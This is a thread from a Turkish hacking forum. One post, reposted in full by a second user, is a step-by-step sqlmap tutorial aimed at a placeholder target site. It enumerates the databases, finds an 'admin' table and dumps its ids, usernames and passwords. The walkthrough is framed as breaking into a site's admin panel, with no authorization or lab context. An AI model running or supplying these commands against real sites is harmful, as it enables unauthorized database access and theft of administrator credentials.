Neler yeni

Sqlmap Nedir Sqlmap Kullanımı

redenergy

Bronz Üye
Katılım
31 Mart 2021
Mesajlar
107
Tepkime puanı
78
İlgi Alanlarınız
Sosyal medya uzmanlığı,siber güvenlik
Cinsiyet
  1. Erkek
  2. Kadın
Sqlmap Nedir? : Sqlmap, web uygulamalarında SQL Injection tespitini ve bulunan açıkların exploit edilmesini otomatik hale getiren açık kaynak kodlu bir araçtır.
unnamed.png
Konuyu fazla uzatmadan “sqlmap” de var olan komutları ve bu araç ile yapılan örnek bir saldırıya yer verelim.

Komut satırına “sqlmap -h” yazdığımızda bu araç ile kullanılabilecek kod dizinleri karşımıza çıkıyor.

Yukarıda da gördüğümüz gibi bu araç ile ilgili var olan komutları ve açıklamalarına yer verilmiştir. Kullanımı ise mesela bir sitenin mevcut veritabanlarını bulmak istiyorsak kullanacağımız komut:”sqlmap -u http://www.hedefsite.com/index.php?id=2 --dbs” yazıyoruz.

Şimdi ise bu araç kullanarak hedef sitenin veritabanına erişip, sitenin admin paneli kullanıcı adı ve şifresine nasıl erişebileceğimize bakalım. Herhangi bir olumsuz durum yaşanmaması sebebiyle örnek olarak kullandığım sitenin bilgilerini sileceğim.

İlk olarak komut satırına sqlmap -u http://www.hedefsite.com/index.php?id=2 --dbs kodunu yazıyoruz.

Yukarı da gördüğümüz gibi ilgili sitenin veritabanını buldu. Bizim işlem yapacağımız yer information_**** diye devam eden değil. Bunun bir üstündeki veri tabanı ile işlem yapacağız. Parametreye değer girerken ismini komple kapattığım veri tabanı ismini giriniz. Şimdi ise bulunan veri tabanında hangi tablolar var bir göz atalım. Bunun için “sqlmap -u http://www.hedefsite.com/index.php?id=2 -D veritabani_adi --tables” komutunu yazıyoruz.

Yukarıda arama yaptığımız veri tabanında 7 adet tablo buldu ama burada adı “admin” olan veri tabanı tablosu benim gözüme takıldı bakalım burada neler varmış. Bunun için komut satırına “sqlmap -u http://www.hedefsite.com/index.php?id=2 -T admin --columns” yazıp gelen sonuçları inceleyelim.

Burada karşımıza 3 tane sütun çıkıyor. İlgili sitenin admin id, kullanıcı adı ve şifrelerinin kayıtlı olduğu sütunlar karşımıza çıkıyor. Buradaki sütunların hepsine bir göz atalım bunun için komut satırına “sqlmap -u http://hedefsite.com/index.php?id=2 -T admin -C id,password,username --dump” yazıp ilgili sütunlar da ne gibi bilgiler saklanıyor bakalım.

Yukarı da ilgili sitenin admin bilgilerine ulaştık. Bazı sistemlerde buradaki parolalar şifreli bir şekilde tutulmaktadır
 

Tosun

tosunc.uk
Moderatör
Katılım
19 Aralık 2020
Mesajlar
1,138
Tepkime puanı
1,680
İlgi Alanlarınız
o
Cinsiyet
  1. Erkek
eline saglik kardeşim
 

The One

Altın Üye
Katılım
24 Ocak 2021
Mesajlar
365
Tepkime puanı
494
İlgi Alanlarınız
Siber Güvenlik
Cinsiyet
  1. Erkek
Sqlmap Nedir? : Sqlmap, web uygulamalarında SQL Injection tespitini ve bulunan açıkların exploit edilmesini otomatik hale getiren açık kaynak kodlu bir araçtır.
Ekli dosyayı görüntüle 338
Konuyu fazla uzatmadan “sqlmap” de var olan komutları ve bu araç ile yapılan örnek bir saldırıya yer verelim.

Komut satırına “sqlmap -h” yazdığımızda bu araç ile kullanılabilecek kod dizinleri karşımıza çıkıyor.

Yukarıda da gördüğümüz gibi bu araç ile ilgili var olan komutları ve açıklamalarına yer verilmiştir. Kullanımı ise mesela bir sitenin mevcut veritabanlarını bulmak istiyorsak kullanacağımız komut:”sqlmap -u http://www.hedefsite.com/index.php?id=2 --dbs” yazıyoruz.

Şimdi ise bu araç kullanarak hedef sitenin veritabanına erişip, sitenin admin paneli kullanıcı adı ve şifresine nasıl erişebileceğimize bakalım. Herhangi bir olumsuz durum yaşanmaması sebebiyle örnek olarak kullandığım sitenin bilgilerini sileceğim.

İlk olarak komut satırına sqlmap -u http://www.hedefsite.com/index.php?id=2 --dbs kodunu yazıyoruz.

Yukarı da gördüğümüz gibi ilgili sitenin veritabanını buldu. Bizim işlem yapacağımız yer information_**** diye devam eden değil. Bunun bir üstündeki veri tabanı ile işlem yapacağız. Parametreye değer girerken ismini komple kapattığım veri tabanı ismini giriniz. Şimdi ise bulunan veri tabanında hangi tablolar var bir göz atalım. Bunun için “sqlmap -u http://www.hedefsite.com/index.php?id=2 -D veritabani_adi --tables” komutunu yazıyoruz.

Yukarıda arama yaptığımız veri tabanında 7 adet tablo buldu ama burada adı “admin” olan veri tabanı tablosu benim gözüme takıldı bakalım burada neler varmış. Bunun için komut satırına “sqlmap -u http://www.hedefsite.com/index.php?id=2 -T admin --columns” yazıp gelen sonuçları inceleyelim.

Burada karşımıza 3 tane sütun çıkıyor. İlgili sitenin admin id, kullanıcı adı ve şifrelerinin kayıtlı olduğu sütunlar karşımıza çıkıyor. Buradaki sütunların hepsine bir göz atalım bunun için komut satırına “sqlmap -u http://hedefsite.com/index.php?id=2 -T admin -C id,password,username --dump” yazıp ilgili sütunlar da ne gibi bilgiler saklanıyor bakalım.

Yukarı da ilgili sitenin admin bilgilerine ulaştık. Bazı sistemlerde buradaki parolalar şifreli bir şekilde tutulmaktadır
Teşekkürler
 

Roza

Altın Üye
Katılım
30 Mart 2021
Mesajlar
416
Tepkime puanı
647
İlgi Alanlarınız
Galiba Hiç bişi :/
Cinsiyet
  1. Erkek
Teşekkürler :)
 

Konuyu görüntüleyen kullanıcılar:

Hukuksal Sorunlar İçin [email protected]
For Legal Problems [email protected]
Hacktivizm.Org
Hacktivizm.Org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Hacktivizm.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Hacktivizm saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Hacktivizm üyelerinin yaptığı bireysel hack faaliyetlerinden Hacktivizm sorumlu değildir. Sitelerinize Hacktivizm ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz. Sitemizde yer alan içerikler hakkındaki şikayetlerinizi Buradan iletişime geçerek bildirebilirsiniz. Please Report Abuse, DMCA, Scamming, Harassment, Crack or any Illegal Activities to [email protected]
Hacktivizm Twitter Hacktivizm Youtube Hacktivizm İnstagram Hacktivizm Telegram